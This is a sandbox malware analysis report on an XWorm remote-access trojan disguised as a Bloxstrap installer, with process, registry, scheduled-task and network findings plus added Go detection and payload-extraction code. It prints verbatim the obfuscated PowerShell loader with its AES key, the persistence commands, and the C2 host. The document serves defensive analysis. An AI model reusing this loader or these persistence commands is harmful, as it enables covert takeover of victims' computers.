Malware Analysis Report

2024-11-16 13:41

Sample ID 240531-vatddafb38
Target Bloxstrap-v2.5.4.exe
SHA256 669d8928c72692d168e5c283fcff37613d98e31267b81d41931651eeed78bb8b
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

669d8928c72692d168e5c283fcff37613d98e31267b81d41931651eeed78bb8b

Threat Level: Known bad

The file Bloxstrap-v2.5.4.exe was found to be: Known bad. Chain observed in behavioral1: the submitted binary (PID 1432) writes a second Bloxstrap-v2.5.4.exe, XClient.exe and XClient.bat to C:\ProgramData and runs them; cmd.exe runs XClient.bat, which starts a hidden PowerShell (-ep bypass) that pulls two AES-CBC-encrypted, gzip-compressed .NET assemblies out of the .bat's ':: ' comment line and invokes them via Assembly.Load. Persistence is set three ways: an HKCU Run value XClient pointing at C:\Users\Admin\AppData\Roaming\XClient.exe, a schtasks job "XClient" that runs that file every minute at highest run level, and a logon task RuntimeBroker_startup_623_str that runs startup_str_623.vbs, which re-enters the same .bat/PowerShell loader from startup_str_623.bat. The only non-DNS network activity is TCP to selected-thongs.gl.at.ply.gg (147.185.221.19:80).

Malicious Activity Summary

xworm execution persistence rat trojan

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 16:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 16:47

Reported

2024-05-31 16:50

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\ProgramData\Bloxstrap-v2.5.4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\ProgramData\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\ProgramData\XClient.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Bloxstrap-v2.5.4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\Bloxstrap-v2.5.4.exe
PID 1432 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\Bloxstrap-v2.5.4.exe
PID 1432 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\XClient.exe
PID 1432 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\XClient.exe
PID 1432 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\Windows\system32\cmd.exe
PID 3716 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3716 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2520 wrote to memory of 728 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2520 wrote to memory of 728 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3716 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3716 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 1436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4876 wrote to memory of 1436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1436 wrote to memory of 4500 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1436 wrote to memory of 4500 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4500 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4500 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1044 wrote to memory of 4800 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1044 wrote to memory of 4800 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4728 wrote to memory of 4052 N/A C:\ProgramData\XClient.exe C:\Windows\System32\schtasks.exe
PID 4728 wrote to memory of 4052 N/A C:\ProgramData\XClient.exe C:\Windows\System32\schtasks.exe
PID 4500 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4500 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence
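
The signatures above each correspond to one command line captured under Processes below. As an added example (not part of the report and not a vendor rule set), the Go program below encodes those behaviours as process-creation detections and runs them over the report's own command lines plus two constructed benign controls. The event shape (image path plus command line) and the rule names are this example's assumptions; the thresholds are deliberately specific to what this sample did (a one-minute repeating schtasks job at highest run level, a hidden ExecutionPolicy-bypass PowerShell that reflectively loads an assembly, a logon task whose action is a .vbs in AppData\Roaming, and cmd.exe or WScript launching a .bat or .vbs from a user-writable path), so treat them as a starting point and tune against your own baseline.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ProcEvent is a minimal process-creation record (image path and full command
// line), the shape Sysmon Event ID 1 or an EDR telemetry stream gives you.
type ProcEvent struct {
	Image   string
	CmdLine string
}

// Rule is a named predicate over the lower-cased image path and command line.
type Rule struct {
	Name  string
	Match func(img, cmd string) bool
}

var (
	// The loader hides .NET member names as reversed literals, e.g.
	// ('daoL'[-1..-4] -join '') for "Load"; benign scripts almost never do this.
	reversedLiteral = regexp.MustCompile(`'[^']+'\[-1\.\.-\d+\]\s*-join\s*''`)
	// User-writable drop locations used by this sample (input is lower-cased).
	userWritableDir = regexp.MustCompile(`\\(appdata\\roaming|programdata)\\`)
)

func hasAll(s string, needles ...string) bool {
	for _, n := range needles {
		if !strings.Contains(s, n) {
			return false
		}
	}
	return true
}

func image(path, exe string) bool { return strings.HasSuffix(path, `\`+exe) }

// Rules encode the five process-level behaviours seen in this detonation.
var Rules = []Rule{
	{"cmd_runs_bat_from_user_writable_dir", func(img, cmd string) bool {
		return image(img, "cmd.exe") && hasAll(cmd, "/c", ".bat") && userWritableDir.MatchString(cmd)
	}},
	{"powershell_hidden_bypass_reflective_load", func(img, cmd string) bool {
		return image(img, "powershell.exe") && hasAll(cmd, "-windowstyle hidden", "-ep bypass") &&
			(strings.Contains(cmd, "reflection.assembly") || reversedLiteral.MatchString(cmd))
	}},
	{"register_scheduledtask_logon_script_highest", func(img, cmd string) bool {
		return image(img, "powershell.exe") && hasAll(cmd, "register-scheduledtask", "-atlogon", "-runlevel highest", ".vbs")
	}},
	{"wscript_vbs_from_user_writable_dir", func(img, cmd string) bool {
		return image(img, "wscript.exe") && strings.Contains(cmd, ".vbs") && userWritableDir.MatchString(cmd)
	}},
	{"schtasks_every_minute_highest", func(img, cmd string) bool {
		return image(img, "schtasks.exe") && hasAll(cmd, "/create", "/sc minute", "/mo 1", "/rl highest")
	}},
}

// Classify returns the names of every rule the event trips (nil if none).
func Classify(ev ProcEvent) []string {
	img, cmd := strings.ToLower(ev.Image), strings.ToLower(ev.CmdLine)
	var hits []string
	for _, r := range Rules {
		if r.Match(img, cmd) {
			hits = append(hits, r.Name)
		}
	}
	return hits
}

// SampleEvents are command lines from the Processes section of this report
// (the loader is cut down to its tell-tale fragment), followed by two benign
// controls: "net file" from the report and a constructed schtasks /query.
var SampleEvents = []ProcEvent{
	{`C:\Windows\system32\cmd.exe`, `C:\Windows\system32\cmd.exe /c ""C:\ProgramData\XClient.bat" "`},
	{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function execute_function($param_var,$param2_var){ $UlOJl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pCbaQ=$UlOJl.EntryPoint; $pCbaQ.Invoke($null, $param2_var);}`},
	{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_623_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_623.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force`},
	{`C:\Windows\System32\WScript.exe`, `"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_623.vbs"`},
	{`C:\Windows\System32\schtasks.exe`, `"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"`},
	{`C:\Windows\system32\net.exe`, `net file`},
	{`C:\Windows\System32\schtasks.exe`, `"C:\Windows\System32\schtasks.exe" /query /tn "XClient"`},
}

func main() {
	for _, ev := range SampleEvents {
		fmt.Printf("%-60.60s -> %v\n", ev.CmdLine, Classify(ev))
	}
}
```

The reversed-literal regex is the cheapest discriminator here: the `'...'[-1..-N] -join ''` idiom resolves at run time to names such as FromBase64String, ReadAllText and Load, appears in both copies of the loader in this report, and is essentially absent from administrative scripts. The substring checks on schtasks and Register-ScheduledTask arguments are order-independent on purpose, since the builder can reorder switches without changing behaviour.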

Processes

C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe"

C:\ProgramData\Bloxstrap-v2.5.4.exe

"C:\ProgramData\Bloxstrap-v2.5.4.exe"

C:\ProgramData\XClient.exe

"C:\ProgramData\XClient.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\XClient.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PJS/BcanmwhMWKk5w9O57bBkKeB36Vroa2tTsg6h/tQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xxW68pRc8sY81E0yM+WLKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EIthi=New-Object System.IO.MemoryStream(,$param_var); $DVqsl=New-Object System.IO.MemoryStream; $sHwPF=New-Object System.IO.Compression.GZipStream($EIthi, [IO.Compression.CompressionMode]::Decompress); $sHwPF.CopyTo($DVqsl); $sHwPF.Dispose(); $EIthi.Dispose(); $DVqsl.Dispose(); $DVqsl.ToArray();}function execute_function($param_var,$param2_var){ $UlOJl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pCbaQ=$UlOJl.EntryPoint; $pCbaQ.Invoke($null, $param2_var);}$ZNyHX = 'C:\ProgramData\XClient.bat';$host.UI.RawUI.WindowTitle = $ZNyHX;$CXdWy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZNyHX).Split([Environment]::NewLine);foreach ($schqS in $CXdWy) { if ($schqS.StartsWith(':: ')) { $BGpTM=$schqS.Substring(3); break; }}$payloads_var=[string[]]$BGpTM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_623_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_623.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_623.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_623.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PJS/BcanmwhMWKk5w9O57bBkKeB36Vroa2tTsg6h/tQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xxW68pRc8sY81E0yM+WLKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EIthi=New-Object System.IO.MemoryStream(,$param_var); $DVqsl=New-Object System.IO.MemoryStream; $sHwPF=New-Object System.IO.Compression.GZipStream($EIthi, [IO.Compression.CompressionMode]::Decompress); $sHwPF.CopyTo($DVqsl); $sHwPF.Dispose(); $EIthi.Dispose(); $DVqsl.Dispose(); $DVqsl.ToArray();}function execute_function($param_var,$param2_var){ $UlOJl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pCbaQ=$UlOJl.EntryPoint; $pCbaQ.Invoke($null, $param2_var);}$ZNyHX = 'C:\Users\Admin\AppData\Roaming\startup_str_623.bat';$host.UI.RawUI.WindowTitle = $ZNyHX;$CXdWy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZNyHX).Split([Environment]::NewLine);foreach ($schqS in $CXdWy) { if ($schqS.StartsWith(':: ')) { $BGpTM=$schqS.Substring(3); break; }}$payloads_var=[string[]]$BGpTM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe
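
The loader on the two long powershell.exe command lines above reads its companion .bat, takes the first line beginning with ':: ', splits it on '\', and turns each piece into a .NET assembly by base64-decoding, AES-CBC-decrypting with the hard-coded key and IV, and gunzipping, before Assembly.Load and EntryPoint.Invoke. The Go program below is an added example, not code from the report, the sandbox or the malware author: it performs the same transform offline and writes the decoded blobs to disk instead of executing them. The key and IV are the literals from the command line above and the batch-file layout is taken from the loader's own parsing logic; the output names payload0.bin, payload1.bin and the usage string are this example's own choice.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"log"
	"os"
	"strings"
)

// Key and IV hard-coded in the PowerShell loader captured in this report
// (AES-256-CBC, PKCS7 padding, the same IV reused for both payloads).
const (
	LoaderKeyB64 = "PJS/BcanmwhMWKk5w9O57bBkKeB36Vroa2tTsg6h/tQ="
	LoaderIVB64  = "xxW68pRc8sY81E0yM+WLKA=="
)

// ExtractPayloads mirrors the loader minus Assembly.Load: take the first line
// starting with ":: " (a batch comment, so cmd.exe ignores it), split it on
// '\', then base64-decode, AES-CBC-decrypt and gunzip each piece. The blobs
// are returned for static analysis, never executed.
func ExtractPayloads(bat, keyB64, ivB64 string) ([][]byte, error) {
	key, err1 := base64.StdEncoding.DecodeString(keyB64)
	iv, err2 := base64.StdEncoding.DecodeString(ivB64)
	if err1 != nil || err2 != nil || len(iv) != aes.BlockSize {
		return nil, errors.New("bad key or IV encoding")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	var carrier string
	for _, line := range strings.Split(bat, "\n") {
		if line = strings.TrimRight(line, "\r"); strings.HasPrefix(line, ":: ") {
			carrier = line[3:]
			break
		}
	}
	if carrier == "" {
		return nil, errors.New("no ':: ' carrier line in batch file")
	}
	var out [][]byte
	for i, part := range strings.Split(carrier, `\`) {
		raw, err := decodePart(part, block, iv)
		if err != nil {
			return nil, fmt.Errorf("payload %d: %w", i, err)
		}
		out = append(out, raw)
	}
	return out, nil
}

func decodePart(part string, block cipher.Block, iv []byte) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(part)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("bad base64 or unaligned ciphertext")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	// Strict PKCS7 check: a wrong key fails here instead of yielding garbage.
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS7 padding (wrong key?)")
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt[:len(pt)-n]))
	if err != nil {
		return nil, err
	}
	return io.ReadAll(zr)
}

func main() {
	if len(os.Args) != 2 {
		log.Fatal("usage: extract <stager.bat>")
	}
	bat, err := os.ReadFile(os.Args[1])
	if err != nil {
		log.Fatal(err)
	}
	payloads, err := ExtractPayloads(string(bat), LoaderKeyB64, LoaderIVB64)
	if err != nil {
		log.Fatal(err)
	}
	// Each blob goes to disk for a .NET decompiler; the loader treats them as
	// managed assemblies, so both should start with an MZ header.
	for i, p := range payloads {
		name := fmt.Sprintf("payload%d.bin", i)
		if err := os.WriteFile(name, p, 0o600); err != nil {
			log.Fatal(err)
		}
		fmt.Printf("%s: %d bytes, MZ header: %v\n", name, len(p), bytes.HasPrefix(p, []byte("MZ")))
	}
}
```

Run it against a copy of XClient.bat or startup_str_623.bat recovered from the sandbox (both carry the same key and IV). The loader invokes the first assembly with no arguments and the second with a one-element string[] containing an empty string, so expect a parameterless Main on payload0 and a Main(string[]) on payload1. If the builder rotates the key, the PKCS7 check fails rather than silently writing noise; in that case lift the new key and IV from the captured command line and pass them in place of the constants.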

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 selected-thongs.gl.at.ply.gg udp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
